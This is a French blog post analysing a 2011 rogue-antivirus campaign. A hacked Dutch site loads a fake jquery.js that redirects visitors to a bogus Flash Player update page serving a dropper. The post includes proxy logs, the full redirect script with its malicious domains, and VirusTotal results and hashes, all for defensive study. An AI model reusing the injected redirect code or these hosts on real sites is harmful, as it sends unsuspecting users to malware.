Unable to Update Flash Player : rogue attack

Un petite variante des exploits sur site WEB où d’habitude on voit des sites hackés qui contiennent des exploits afin d’installer automatiquement des malwares lors de la visite du site.

Cette fois-ci, un site Web hacké (merlie.nl) contient un Javascript qui effectue une redirection vers une page WEB

1305985877.317   1563 192.168.1.94 TCP_MISS/200 15596 GET http://merlie.nl/ – DIRECT/77.232.82.22 text/html
1305985877.465    189 192.168.1.94 TCP_MISS/200 14210 GET http://ideal.nl/img/155×55.gif – DIRECT/79.170.95.184 image/gif
1305985878.398   1161 192.168.1.94 TCP_MISS/200 412 GET http://www.merlie.nl/images/spacer.gif – DIRECT/77.232.82.22 image/gif
1305985878.472     70 192.168.1.94 TCP_MISS/200 2867 GET http://www.merlie.nl/images/merlielogo.png – DIRECT/77.232.82.22 image/png
1305985878.529    191 192.168.1.94 TCP_MISS/200 562 GET http://fairbankhouston.cz.cc/jquery.js – DIRECT/178.162.190.233 text/html
1305985878.572   1335 192.168.1.94 TCP_MISS/200 24648 GET http://www.merlie.nl/stylesheet.css – DIRECT/77.232.82.22 text/css
1305985878.619     74 192.168.1.94 TCP_MISS/200 2185 GET http://www.merlie.nl/includes/languages/dutch/images/buttons/m1.jpg – DIRECT/77.232.82.22 image/jpeg
1305985878.650     71 192.168.1.94 TCP_MISS/200 3296 GET http://www.merlie.nl/includes/languages/dutch/images/buttons/m2.jpg – DIRECT/77.232.82.22 image/jpeg
1305985878.666     63 192.168.1.94 TCP_MISS/000 0 GET http://www.merlie.nl/images/back.gif – DIRECT/77.232.82.22 –
1305985878.667     65 192.168.1.94 TCP_MISS/000 0 GET http://www.merlie.nl/images/left.gif – DIRECT/77.232.82.22 –
1305985878.667     45 192.168.1.94 TCP_MISS/000 0 GET http://www.merlie.nl/includes/languages/dutch/images/buttons/m3.jpg – DIRECT/77.232.82.22 –
1305985878.667     14 192.168.1.94 TCP_MISS/000 0 GET http://www.merlie.nl/includes/languages/dutch/images/buttons/m4.jpg – DIRECT/77.232.82.22 –
1305985878.986    196 192.168.1.94 TCP_MISS/200 636 GET http://conorsemerald.cx.cc/if/index.php – DIRECT/178.162.190.233 text/html
1305985878.995    309 192.168.1.94 TCP_MISS/000 0 GET http://www.merlie.nl/images/pimp1.gif – DIRECT/77.232.82.22 –
1305985879.052     49 192.168.1.94 TCP_MISS/200 1549 GET http://conorsemerald.cx.cc/if/flash/ – DIRECT/178.162.190.233 text/html
1305985879.108     48 192.168.1.94 TCP_MISS/200 1404 GET http://conorsemerald.cx.cc/if/flash/template.css – DIRECT/178.162.190.233 text/css
1305985879.228     89 192.168.1.94 TCP_MISS/404 712 GET http://conorsemerald.cx.cc/if/flash/background_gradient.jpg – DIRECT/178.162.190.233 text/html
1305985879.261    128 192.168.1.94 TCP_MISS/200 14928 GET http://conorsemerald.cx.cc/if/flash/flash.png – DIRECT/178.162.190.233 image/png
1305985879.354    234 192.168.1.94 TCP_MISS/404 361 GET http://irraberglin.cx.cc/in.php?a=QQkFBwQEAQIHDAMFEkcJBQcEAQ0BDAwDAg== – DIRECT/46.108.225.42 text/html

Unable to Update Flash Player : rogue attack

Le contenu du jquery.js :

    var colors_picked = 1;
    var colors_nopick = 1;
    function check_colors_picked() {}
    if(!vvews) {
    var vvews = 1;

    if(navigator.appName == "Microsoft Internet Explorer") {
  window.document.execCommand("Stop");
        document.location = "http://conorsemerald.cx.cc/if/index.php";
    } else {
  window.stop();
        window.location = "http://conorsemerald.cx.cc/if/index.php";
    }

}

Le gros avantage contrairement au Javascript offusqué et qu’il n’est pas détecté par les antivirus, le javascript ne verra donc pas bloqué par un webguard lors de la visite du site hacké (même si la page contient un 404 avec rraberglin.cx.cc qui lui doit contenir un exploit sur site WEB).
Ce dernier conduit vers une fausse page de télécharge du Flash Player :

Unable To Update Flash Player
You Are Using An Outdated Version Of Flash Player

Unable to Update Flash Player : rogue attack

et bien sûr propose le téléchargement d’un malware :

Unable to Update Flash Player : rogue attack

dont voici la détection : http://www.virustotal.com/file-scan/report.html?id=8debd6b610fa312999bd5cd863355b5ae76c5942e30f19f7b303d1bbb1b69087-1305986406

File name: update.exe
Submission date: 2011-05-21 14:00:06 (UTC)
Current status: finished
Result: 4/ 43 (9.3%) 

Antivirus     Version     Last Update     Result
AhnLab-V3    2011.05.22.00    2011.05.21    –
AntiVir    7.11.8.85    2011.05.20    –
Antiy-AVL    2.0.3.7    2011.05.21    –
Avast    4.8.1351.0    2011.05.21    Win32:Morphex
Avast5    5.0.677.0    2011.05.21    Win32:Morphex
AVG    10.0.0.1190    2011.05.21    –
BitDefender    7.2    2011.05.21    –
CAT-QuickHeal    11.00    2011.05.21    –
ClamAV    0.97.0.0    2011.05.21    –
Commtouch    5.3.2.6    2011.05.21    –
Comodo    8780    2011.05.21    –
DrWeb    5.0.2.03300    2011.05.21    –
Emsisoft    5.1.0.5    2011.05.21    –
eSafe    7.0.17.0    2011.05.19    –
eTrust-Vet    36.1.8339    2011.05.20    –
F-Prot    4.6.2.117    2011.05.21    –
F-Secure    9.0.16440.0    2011.05.21    –
Fortinet    4.2.257.0    2011.05.21    –
GData    22    2011.05.21    Win32:Morphex
Ikarus    T3.1.1.104.0    2011.05.21    –
Jiangmin    13.0.900    2011.05.20    –
K7AntiVirus    9.103.4693    2011.05.20    –
Kaspersky    9.0.0.837    2011.05.21    –
McAfee    5.400.0.1158    2011.05.21    –
McAfee-GW-Edition    2010.1D    2011.05.20    –
Microsoft    1.6903    2011.05.21    –
NOD32    6140    2011.05.21    –
Norman    6.07.07    2011.05.20    –
nProtect    2011-05-21.01    2011.05.21    –
Panda    10.0.3.5    2011.05.21    –
PCTools    7.0.3.5    2011.05.19    –
Prevx    3.0    2011.05.21    High Risk Cloaked Malware
Rising    23.58.05.03    2011.05.21    –
Sophos    4.65.0    2011.05.21    –
SUPERAntiSpyware    4.40.0.1006    2011.05.21    –
Symantec    20111.1.0.186    2011.05.21    –
TheHacker    6.7.0.1.202    2011.05.20    –
TrendMicro    9.200.0.1012    2011.05.21    –
TrendMicro-HouseCall    9.200.0.1012    2011.05.21    –
VBA32    3.12.16.0    2011.05.20    –
VIPRE    9344    2011.05.21    –
ViRobot    2011.5.21.4472    2011.05.21    –
VirusBuster    13.6.366.0    2011.05.21    –
Additional information
MD5   : d229bf55ecc99e56df8635cbc5e9db65
SHA1  : 132012cbad608ef674affa9bea49641efed24fc9
SHA256: 8debd6b610fa312999bd5cd863355b5ae76c5942e30f19f7b303d1bbb1b69087

Le dropper installe le rogue MS Removal Tool, famille de rogue déjà bien connu – j’en profite d’ailleurs pour signaler une variante Easy Cleaner :

Unable to Update Flash Player : rogue attackA voir si cela permettra d’infecter beaucoup de monde, ce qu’on verra vite sur les forums de désinfection.

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 23 times, 1 visits today)

One thought on “Unable to Update Flash Player : rogue attack

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *